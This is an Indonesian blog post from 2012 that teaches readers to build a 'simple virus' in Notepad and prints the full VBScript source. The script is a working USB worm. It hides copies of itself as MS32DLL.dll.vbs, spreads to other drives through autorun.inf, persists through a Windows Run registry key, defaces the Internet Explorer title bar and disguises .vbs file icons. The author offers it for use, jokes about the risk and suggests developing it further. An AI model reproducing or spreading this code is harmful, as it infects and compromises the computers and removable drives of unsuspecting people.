Selasa, 03 Juli 2012

Langsung aja yah gak perlu basa-basi lagi..

Sesuai dengan Judulnya, yaitu Membuat Virus Sederhana..
Ini paling sederhana, Yang lo butuhin cuma NotePad aja kok..
Oke Sekarang Coba buka Notepadnya, dan masukin Script ini..

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"

set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Ciebal"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname

Simpan dengan nama .vbs contoh virus.vbs
Apa yang terjadi..?

Tanggung Resikonya sendiri..
Xixixiixi..
klo antivirus lo aktiv pasti langsung kena tuh script..

Oke segitu aja deh..
Semoga bermanfaat, script ini masih bisa di kembangkan lagi..

Search:Ciebal.web.id

Related Posts:

  • Cara Modifikasi Windows XP Dengan NLiteCara Modifikasi Windows XP dan Windows 7 dengan NLite or Cara Edit Windows XP dan Windows 7 dengan NLite. Anda pernah mengalami Blue Screen gak, pada saat menginstall atau downgrade sistem operasi pada Not… Read More
  • Shutdown dan restart komputer dengan tepukan tanganMungkin biasa anda menshutdown atau merestart komputer anda dengan menggunakan mouse, kali ini saya membahas cara menshutdown dam merestart komputer dengan cara bunyi suara/ tepuk tanganDan ini yang paling fenomenal gan, apli… Read More
  • Cara Kunci Hardisk Supaya tidak Bisa Di copy Ke FlashDiskArtikel Ini dikhususkan untuk anda yang memiliki dokumen penting di komputer anda di kantor agar dokumen anda tidak dapat di copy ke flashdisk oleh Orang Lain, Tapi anda bisa saja mengcopy data anda Dari FlashDisk Ke Hardisk … Read More
  • Membuat Led Keyboard menjadi Monitoring Internet Bagi anda yang memiliki komputer dan sudah mengenal komputer, tentu tau apa itu Keyboard, keyboard adalah salah satu komponen komputer sebagai input data, dimana keyboard akan memberikan perintah dan mengisi data yang a… Read More
  • Memperbaiki Motherboard yang RusakPapan utama (motherboard) adalah papan sirkuit yang terhubung komponen elektronik seperti mikroprosesor dan memori (RAM, ROM, BIOS) dan chip kontroler lainnya.  Masalah umum dari sebuah motherboard yang rusak:1. Mati Tot… Read More

0 komentar:

Posting Komentar

Sample Text

Follow Us on Facebook



JOIN WITH US

Popular Posts